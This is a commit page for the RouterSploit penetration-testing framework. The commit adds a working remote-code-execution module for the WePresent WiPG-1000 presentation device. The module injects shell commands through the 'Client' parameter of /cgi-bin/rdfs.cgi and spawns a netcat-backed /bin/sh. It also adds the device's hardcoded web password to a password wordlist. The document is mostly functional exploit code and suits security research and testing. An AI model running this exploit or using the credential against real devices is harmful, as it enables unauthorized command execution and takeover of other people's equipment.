WePresent WiPG-1000 RCE (#259)

* WePresent WiPG-1000 RCE exploit * Hardcoded password for web interface * Adding comment according to PR review * Fixing comment

WePresent WiPG-1000 RCE (#259)
* WePresent WiPG-1000 RCE exploit * Hardcoded password for web interface * Adding comment according to PR review * Fixing comment
1d2747e1 · Marcin Bury · Mariusz Kupidura · 218fba63 · 1d2747e1 · 1d2747e1
Commit 1d2747e1 authored May 02, 2017 by Marcin Bury Committed by Mariusz Kupidura May 02, 2017
Showing with 67 additions and 0 deletions

__init__.py routersploit/modules/exploits/misc/wepresent/__init__.py +0 -0

wipg1000_rce.py routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py +66 -0

passwords.txt routersploit/wordlists/passwords.txt +1 -0

No files found.
--- a/routersploit/modules/exploits/misc/wepresent/__init__.py
+++ b/routersploit/modules/exploits/misc/wepresent/__init__.py
--- a/routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py
+++ b/routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+    http_request,
+    mute,
+    validators,
+    shell,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for WePresent WiPG-1000 Command Injection vulnerability.
+    If the target is vulnerable, it is possible to execute commands on operating system level.
+    """
+    __info__ = {
+        'name': 'WePresent WiPG-1000 RCE',
+        'description': 'Module exploits WePresent WiPG-1000 Command Injection vulnerability which allows '
+                       'executing commands on operating system level.',
+        'authors': [
+            'Matthias Brun',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.redguard.ch/advisories/wepresent-wipg1000.txt',
+        ],
+        'devices': [
+            'WePresent WiPG-1000 <=2.0.0.7',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port', validators=validators.integer)
+
+    def run(self):
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            print_status("This is blind command injection, response is not available")
+            shell(self, architecture="mips", binary="netcat", shell="/bin/sh")
+        else:
+            print_error("Exploit failed - exploit seems to be not vulnerable")
+
+    def execute(self, cmd):
+        """ callback used by shell functionality """
+        payload = ";{};".format(cmd)
+
+        url = "{}:{}/cgi-bin/rdfs.cgi".format(self.target, self.port)
+        data = {
+            "Client": payload,
+            "Download": "Download"
+        }
+
+        http_request(method="POST", url=url, data=data)
+        return ""
+
+    @mute
+    def check(self):
+        url = "{}:{}/cgi-bin/rdfs.cgi".format(self.target, self.port)
+        response = http_request(method="GET", url=url)
+
+        if response is not None and "Follow administrator instructions to enter the complete path" in response.text:
+            return True  # target vulnerable
+
+        return False  # target is not vulnerable
--- a/routersploit/wordlists/passwords.txt
+++ b/routersploit/wordlists/passwords.txt
@@ -222,6 +222,7 @@ atc123
 atlantis
 attack
 awind5885
+aw%root?
 azerty
 backdoor
 barricade